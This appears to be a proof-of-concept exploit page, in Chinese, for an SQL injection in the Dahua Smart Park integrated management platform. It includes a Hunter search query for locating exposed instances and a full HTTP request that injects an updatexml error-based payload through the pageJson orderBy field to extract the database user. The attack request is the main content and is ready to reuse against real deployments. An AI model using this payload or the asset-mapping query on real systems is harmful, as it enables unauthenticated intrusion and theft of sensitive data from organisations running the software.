POC00/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md
2025-04-02 22:36:18 +08:00

41 lines
2.0 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华智慧园区综合管理平台searchJson SQL注入漏洞
# 一、漏洞简介
“大华智慧园区综合管理平台”是一款综合管理平台具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配满足多元化的管理需求同时通过提供智能服务增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息进一步利用可能获取目标系统权限。
# 二、影响版本
+ 大华智慧园区综合管理平台
# 三、资产测绘
+ hunter`app.name="Dahua 大华 智慧园区管理平台"`
![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/9KTgHf02N5fP6w1g/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-737633.png)
+ 登录页面:
![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/9KTgHf02N5fP6w1g/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-887240.png)
# 四、漏洞复现
```plain
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=0B95DCE16676556E16169127452F23E1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
![1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7.png](./img/9KTgHf02N5fP6w1g/1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7-635909.png)
> 更新: 2024-02-29 23:57:18
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nuyho759ar0isski>